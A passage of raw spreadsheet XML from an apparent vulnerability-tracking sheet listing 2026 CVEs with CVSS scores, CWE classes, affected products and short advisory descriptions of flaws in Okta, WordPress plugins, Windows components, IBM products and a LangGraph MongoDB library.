          <t>CWE-90</t>
        </is>
      </c>
      <c r="L1453" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not sanitize SAML assertion attribute values before interpolating them into LDAP search filters in the LDAP datastore configuration. The raw values are substituted directly into the filter string and passed to the LDAP search operation, resulting in modification of the intended query logic.</t>
        </is>
      </c>
      <c r="M1453" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78579</t>
        </is>
      </c>
    </row>
    <row r="1454">
      <c r="A1454" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1454" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-83545</t>
        </is>
      </c>
      <c r="C1454" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1454" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1454" s="5" t="inlineStr"/>
      <c r="F1454" s="5" t="inlineStr"/>
      <c r="G1454" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1454" s="5" t="inlineStr"/>
      <c r="I1454" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1454" s="5" t="inlineStr"/>
      <c r="K1454" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1454" s="5" t="inlineStr">
        <is>
          <t>The CoolClock WordPress plugin before 4.3.8 does not properly escape a custom skin setting before outputting it inside an inline script, allowing users with contributor-level access and above to inject arbitrary JavaScript that executes when the content is viewed.</t>
        </is>
      </c>
      <c r="M1454" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-83545</t>
        </is>
      </c>
    </row>
    <row r="1455">
      <c r="A1455" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1455" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84896</t>
        </is>
      </c>
      <c r="C1455" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1455" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1455" s="5" t="inlineStr"/>
      <c r="F1455" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1455" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1455" s="5" t="inlineStr"/>
      <c r="I1455" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1455" s="5" t="inlineStr"/>
      <c r="K1455" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1455" s="5" t="inlineStr">
        <is>
          <t>The King Addons for Elementor  WordPress plugin before 51.1.77 does not escape a widget display-style setting before outputting it in an HTML attribute, allowing users with Contributor-level access and above to store JavaScript that executes in the browser of any visitor to the affected page, including logged-in administrators.</t>
        </is>
      </c>
      <c r="M1455" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84896</t>
        </is>
      </c>
    </row>
    <row r="1456">
      <c r="A1456" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1456" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84899</t>
        </is>
      </c>
      <c r="C1456" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1456" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1456" s="5" t="inlineStr"/>
      <c r="F1456" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1456" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1456" s="5" t="inlineStr"/>
      <c r="I1456" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1456" s="5" t="inlineStr"/>
      <c r="K1456" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1456" s="5" t="inlineStr">
        <is>
          <t>The VikWidgetsLoader  WordPress plugin before 1.12.0 does not sanitise or escape a block attribute before outputting it inside an inline script, allowing users with the Contributor role to store arbitrary JavaScript that executes in the browser of any user viewing the affected post, including the administrator who reviews the pending submission.</t>
        </is>
      </c>
      <c r="M1456" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84899</t>
        </is>
      </c>
    </row>
    <row r="1457">
      <c r="A1457" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1457" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-84931</t>
        </is>
      </c>
      <c r="C1457" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1457" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1457" s="5" t="inlineStr"/>
      <c r="F1457" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1457" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1457" s="5" t="inlineStr"/>
      <c r="I1457" s="5" t="inlineStr">
        <is>
          <t>2026-09-05</t>
        </is>
      </c>
      <c r="J1457" s="5" t="inlineStr"/>
      <c r="K1457" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1457" s="5" t="inlineStr">
        <is>
          <t>The Joli Table Of Contents WordPress plugin before 3.0.3 does not sanitise or escape a shortcode attribute value before outputting it inside an HTML element's attribute, allowing users with the Author role and above to inject arbitrary HTML attributes and JavaScript that execute in the browser of any user who views the post, including higher-privileged users such as administrators. This crosses a privilege boundary even on multisite, where such users are not permitted to post unfiltered HTML.</t>
        </is>
      </c>
      <c r="M1457" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-84931</t>
        </is>
      </c>
    </row>
    <row r="1458">
      <c r="A1458" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1458" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85456</t>
        </is>
      </c>
      <c r="C1458" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1458" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1458" s="5" t="inlineStr"/>
      <c r="F1458" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1458" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1458" s="5" t="inlineStr"/>
      <c r="I1458" s="5" t="inlineStr">
        <is>
          <t>2026-09-03</t>
        </is>
      </c>
      <c r="J1458" s="5" t="inlineStr"/>
      <c r="K1458" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="L1458" s="5" t="inlineStr">
        <is>
          <t>MOOS-IvP through 24.8.1 fails to properly validate variable names extracted from alog files in the SplitHandler, allowing attackers to write files outside the split directory. Attackers can supply crafted alog files with backslash sequences in variable names to escape the output directory and append to arbitrary files on Windows systems.</t>
        </is>
      </c>
      <c r="M1458" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85456</t>
        </is>
      </c>
    </row>
    <row r="1459">
      <c r="A1459" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1459" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85678</t>
        </is>
      </c>
      <c r="C1459" s="5" t="n">
        <v>6.8</v>
      </c>
      <c r="D1459" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1459" s="5" t="inlineStr"/>
      <c r="F1459" s="5" t="inlineStr"/>
      <c r="G1459" s="5" t="inlineStr">
        <is>
          <t>java</t>
        </is>
      </c>
      <c r="H1459" s="5" t="inlineStr"/>
      <c r="I1459" s="5" t="inlineStr">
        <is>
          <t>2026-09-11</t>
        </is>
      </c>
      <c r="J1459" s="5" t="inlineStr"/>
      <c r="K1459" s="5" t="inlineStr">
        <is>
          <t>CWE-79</t>
        </is>
      </c>
      <c r="L1459" s="5" t="inlineStr">
        <is>
          <t>The AI Builder  WordPress plugin before 2.7.8 does not sanitise custom JavaScript saved against a post before echoing it inside a script tag on the front end, allowing users with contributor level access and above to store arbitrary JavaScript that will execute in the browser of anyone who views the post, including the editor or administrator who reviews it.</t>
        </is>
      </c>
      <c r="M1459" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85678</t>
        </is>
      </c>
    </row>
    <row r="1460">
      <c r="A1460" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1460" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-48121</t>
        </is>
      </c>
      <c r="C1460" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D1460" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1460" s="5" t="inlineStr"/>
      <c r="F1460" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1460" s="5" t="inlineStr">
        <is>
          <t>mongodb</t>
        </is>
      </c>
      <c r="H1460" s="5" t="inlineStr"/>
      <c r="I1460" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1460" s="5" t="inlineStr"/>
      <c r="K1460" s="5" t="inlineStr">
        <is>
          <t>CWE-943</t>
        </is>
      </c>
      <c r="L1460" s="5" t="inlineStr">
        <is>
          <t>@langchain/langgraph-checkpoint-mongodb provides a LangGraph.js CheckpointSaver implementation that uses MongoDB for storage. Versions 1.3.0 and below are vulnerable to NoSQL injection: checkpoint identifiers (thread_id, checkpoint_ns, checkpoint_id) from config.configurable are passed into MongoDB find() queries in MongoDBSaver.getTuple() without type enforcement. If an attacker supplies an object payload (such as MongoDB operators $gt or $ne) instead of a string, it can be interpreted as a query operator, bypassing thread scoping and leaking checkpoints, including pending writes, across tenants. Applications are at risk if they forward untrusted input into config.configurable without coercing it to strings or validating it against a schema, particularly in multi-tenant or user-isolated setups. Apps that only use server-issued, string-typed identifiers with schema validation rejecting non-string fields are not affected. This issue has been fixed in version 1.3.1.</t>
        </is>
      </c>
      <c r="M1460" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-48121</t>
        </is>
      </c>
    </row>
    <row r="1461">
      <c r="A1461" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1461" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-5522</t>
        </is>
      </c>
      <c r="C1461" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D1461" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1461" s="5" t="inlineStr"/>
      <c r="F1461" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1461" s="5" t="inlineStr">
        <is>
          <t>ibm</t>
        </is>
      </c>
      <c r="H1461" s="5" t="inlineStr"/>
      <c r="I1461" s="5" t="inlineStr">
        <is>
          <t>2026-09-04</t>
        </is>
      </c>
      <c r="J1461" s="5" t="inlineStr"/>
      <c r="K1461" s="5" t="inlineStr">
        <is>
          <t>CWE-798</t>
        </is>
      </c>
      <c r="L1461" s="5" t="inlineStr">
        <is>
          <t>IBM QRadar 7.5.0 through 7.5.0 UP15 Interim Fix 005 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.</t>
        </is>
      </c>
      <c r="M1461" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-5522</t>
        </is>
      </c>
    </row>
    <row r="1462">
      <c r="A1462" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1462" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69350</t>
        </is>
      </c>
      <c r="C1462" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D1462" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1462" s="5" t="inlineStr"/>
      <c r="F1462" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1462" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1462" s="5" t="inlineStr"/>
      <c r="I1462" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1462" s="5" t="inlineStr"/>
      <c r="K1462" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1462" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1462" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69350</t>
        </is>
      </c>
    </row>
    <row r="1463">
      <c r="A1463" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1463" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69373</t>
        </is>
      </c>
      <c r="C1463" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D1463" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1463" s="5" t="inlineStr"/>
      <c r="F1463" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1463" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1463" s="5" t="inlineStr"/>
      <c r="I1463" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1463" s="5" t="inlineStr"/>
      <c r="K1463" s="5" t="inlineStr">
        <is>
          <t>CWE-125, CWE-190</t>
        </is>
      </c>
      <c r="L1463" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1463" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69373</t>
        </is>
      </c>
    </row>
    <row r="1464">
      <c r="A1464" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1464" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69449</t>
        </is>
      </c>
      <c r="C1464" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D1464" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1464" s="5" t="inlineStr"/>
      <c r="F1464" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1464" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1464" s="5" t="inlineStr"/>
      <c r="I1464" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1464" s="5" t="inlineStr"/>
      <c r="K1464" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1464" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows BitLocker allows an authorized attacker to execute code locally.</t>
        </is>
      </c>
      <c r="M1464" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69449</t>
        </is>
      </c>
    </row>
    <row r="1465">
      <c r="A1465" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1465" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70594</t>
        </is>
      </c>
      <c r="C1465" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D1465" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1465" s="5" t="inlineStr"/>
      <c r="F1465" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1465" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1465" s="5" t="inlineStr"/>
      <c r="I1465" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1465" s="5" t="inlineStr"/>
      <c r="K1465" s="5" t="inlineStr">
        <is>
          <t>CWE-384</t>
        </is>
      </c>
      <c r="L1465" s="5" t="inlineStr">
        <is>
          <t>Ghost is a Node.js content management system. From 2.2.0 until 6.54.1, Ghost Admin did not invalidate existing sessions on login which could have allowed for session fixation attacks. Successful exploitation would have required another vulnerability on the same domain where Ghost Admin was hosted. This issue is fixed in version 6.54.1.</t>
        </is>
      </c>
      <c r="M1465" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-70594</t>
        </is>
      </c>
    </row>
    <row r="1466">
      <c r="A1466" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1466" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-71339</t>
        </is>
      </c>
      <c r="C1466" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D1466" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1466" s="5" t="inlineStr"/>
      <c r="F1466" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1466" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1466" s="5" t="inlineStr"/>
      <c r="I1466" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1466" s="5" t="inlineStr"/>
      <c r="K1466" s="5" t="inlineStr">
        <is>
          <t>CWE-122</t>
        </is>
      </c>
      <c r="L1466" s="5" t="inlineStr">
        <is>
          <t>Heap-based buffer overflow in Windows Installer allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1466" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-71339</t>
        </is>
      </c>
    </row>
    <row r="1467">
      <c r="A1467" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1467" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72935</t>
        </is>
      </c>
      <c r="C1467" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D1467" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1467" s="5" t="inlineStr"/>
      <c r="F1467" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1467" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1467" s="5" t="inlineStr"/>
      <c r="I1467" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1467" s="5" t="inlineStr"/>
      <c r="K1467" s="5" t="inlineStr">
        <is>
          <t>CWE-125</t>
        </is>
      </c>
      <c r="L1467" s="5" t="inlineStr">
        <is>
          <t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1467" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72935</t>
        </is>
      </c>
    </row>
    <row r="1468">
      <c r="A1468" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1468" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-72948</t>
        </is>
      </c>
      <c r="C1468" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D1468" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1468" s="5" t="inlineStr"/>
      <c r="F1468" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1468" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1468" s="5" t="inlineStr"/>
      <c r="I1468" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1468" s="5" t="inlineStr"/>
      <c r="K1468" s="5" t="inlineStr">
        <is>
          <t>CWE-23</t>
        </is>
      </c>
      <c r="L1468" s="5" t="inlineStr">
        <is>
          <t>Relative path traversal in Windows DNS allows an authorized attacker to elevate privileges locally.</t>
        </is>
      </c>
      <c r="M1468" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-72948</t>
        </is>
      </c>
    </row>
    <row r="1469">
      <c r="A1469" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1469" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78625</t>
        </is>
      </c>
      <c r="C1469" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D1469" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1469" s="5" t="inlineStr"/>
      <c r="F1469" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1469" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H1469" s="5" t="inlineStr"/>
      <c r="I1469" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1469" s="5" t="inlineStr"/>
      <c r="K1469" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1469" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not sanitize dashboard label values before writing them into generated PHP configuration files. The generated file is automatically included during authentication requests, resulting in execution with the privileges of the web server process.</t>
        </is>
      </c>
      <c r="M1469" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78625</t>
        </is>
      </c>
    </row>
    <row r="1470">
      <c r="A1470" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1470" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-78630</t>
        </is>
      </c>
      <c r="C1470" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D1470" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1470" s="5" t="inlineStr"/>
      <c r="F1470" s="5" t="n">
        <v>0.002</v>
      </c>
      <c r="G1470" s="5" t="inlineStr">
        <is>
          <t>okta</t>
        </is>
      </c>
      <c r="H1470" s="5" t="inlineStr"/>
      <c r="I1470" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1470" s="5" t="inlineStr"/>
      <c r="K1470" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="L1470" s="5" t="inlineStr">
        <is>
          <t>The Okta Access Gateway does not neutralize shell metacharacters in SNMP configuration values before a privileged script uses them to construct OS commands. An authenticated local user with access to the management interface can supply crafted values, resulting in the execution of arbitrary OS commands with root privileges.</t>
        </is>
      </c>
      <c r="M1470" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-78630</t>
        </is>
      </c>
    </row>
    <row r="1471">
      <c r="A1471" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1471" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-85981</t>
        </is>
      </c>
      <c r="C1471" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D1471" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1471" s="5" t="inlineStr"/>
      <c r="F1471" s="5" t="n">
        <v>0.001</v>
      </c>
      <c r="G1471" s="5" t="inlineStr">
        <is>
          <t>active directory</t>
        </is>
      </c>
      <c r="H1471" s="5" t="inlineStr"/>
      <c r="I1471" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1471" s="5" t="inlineStr"/>
      <c r="K1471" s="5" t="inlineStr">
        <is>
          <t>CWE-306</t>
        </is>
      </c>
      <c r="L1471" s="5" t="inlineStr">
        <is>
          <t>The administrative panel of the Auth0 AD/LDAP Connector (versions 6.5.0 and earlier) listens on the local loopback interface without requiring authentication. This allows a local, low-privileged user or process on the host system to access the panel's management endpoints without credentials. Through these endpoints, a local user can read configuration details, including plaintext Active Directory service account credentials, and modify connector settings.</t>
        </is>
      </c>
      <c r="M1471" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-85981</t>
        </is>
      </c>
    </row>
    <row r="1472">
      <c r="A1472" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1472" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-9176</t>
        </is>
      </c>
      <c r="C1472" s="5" t="n">
        <v>6.7</v>
      </c>
      <c r="D1472" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1472" s="5" t="inlineStr"/>
      <c r="F1472" s="5" t="inlineStr"/>
      <c r="G1472" s="5" t="inlineStr">
        <is>
          <t>ibm, websphere</t>
        </is>
      </c>
      <c r="H1472" s="5" t="inlineStr"/>
      <c r="I1472" s="5" t="inlineStr">
        <is>
          <t>2026-09-10</t>
        </is>
      </c>
      <c r="J1472" s="5" t="inlineStr"/>
      <c r="K1472" s="5" t="inlineStr">
        <is>
          <t>CWE-94</t>
        </is>
      </c>
      <c r="L1472" s="5" t="inlineStr">
        <is>
          <t>IBM WebSphere Application Server 9.0, and 8.5 is vulnerable to a security bypass due to improper authentication controls. A local attacker could exploit this vulnerability to escalate privileges and gain unauthorized access to protected resources.</t>
        </is>
      </c>
      <c r="M1472" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-9176</t>
        </is>
      </c>
    </row>
    <row r="1473">
      <c r="A1473" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1473" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19201</t>
        </is>
      </c>
      <c r="C1473" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D1473" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1473" s="5" t="inlineStr"/>
      <c r="F1473" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1473" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1473" s="5" t="inlineStr"/>
      <c r="I1473" s="5" t="inlineStr">
        <is>
          <t>2026-09-09</t>
        </is>
      </c>
      <c r="J1473" s="5" t="inlineStr"/>
      <c r="K1473" s="5" t="inlineStr">
        <is>
          <t>CWE-674</t>
        </is>
      </c>
      <c r="L1473" s="5" t="inlineStr">
        <is>
          <t>An uncontrolled recursion vulnerability in the Windows SIPA event log parser of Google go-attestation versions up to and including 0.6.1 allows an attacker to cause a denial of service (DoS). The (*WinEvents).readELAMAggregation function recurses for every nested elamAggregation sub-event without enforcing a maximum recursion depth limit, while the size guard is bypassed on recursive execution paths. By submitting a crafted Windows event log containing deeply nested elamAggregation headers, an attacker can exhaust the goroutine call stack, triggering an unrecoverable fatal runtime error (stack overflow) that immediately crashes the verifier application.</t>
        </is>
      </c>
      <c r="M1473" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19201</t>
        </is>
      </c>
    </row>
    <row r="1474">
      <c r="A1474" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1474" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-69469</t>
        </is>
      </c>
      <c r="C1474" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D1474" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1474" s="5" t="inlineStr"/>
      <c r="F1474" s="5" t="n">
        <v>0.004</v>
      </c>
      <c r="G1474" s="5" t="inlineStr">
        <is>
          <t>windows</t>
        </is>
      </c>
      <c r="H1474" s="5" t="inlineStr"/>
      <c r="I1474" s="5" t="inlineStr">
        <is>
          <t>2026-09-08</t>
        </is>
      </c>
      <c r="J1474" s="5" t="inlineStr"/>
      <c r="K1474" s="5" t="inlineStr">
        <is>
          <t>CWE-122, CWE-190</t>
        </is>
      </c>
      <c r="L1474" s="5" t="inlineStr">
        <is>
          <t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an unauthorized attacker to elevate privileges with a physical attack.</t>
        </is>
      </c>
      <c r="M1474" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-69469</t>
        </is>
      </c>
    </row>
    <row r="1475">
      <c r="A1475" s="5" t="inlineStr">
        <is>
          <t>P4 - Low / Unscored</t>
        </is>
      </c>
      <c r="B1475" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-70593</t>
        </is>
      </c>
      <c r="C1475" s="5" t="n">
        <v>6.6</v>
      </c>
      <c r="D1475" s="5" t="inlineStr">
        <is>
          <t>MEDIUM</t>
        </is>
      </c>
      <c r="E1475" s="5" t="inlineStr"/>
      <c r="F1475" s="5" t="n">
        <v>0.003</v>
      </c>
      <c r="G1475" s="5" t="inlineStr">
        <is>
          <t>node.js</t>
        </is>
      </c>
      <c r="H1475" s="5" t="inlineStr"/>
      <c r="I1475" s="5" t="inlineStr">
        <is>
          <t>2026-08-04</t>
        </is>
      </c>
      <c r="J1475" s="5" t="inlineStr"/>
      <c r="K1475" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
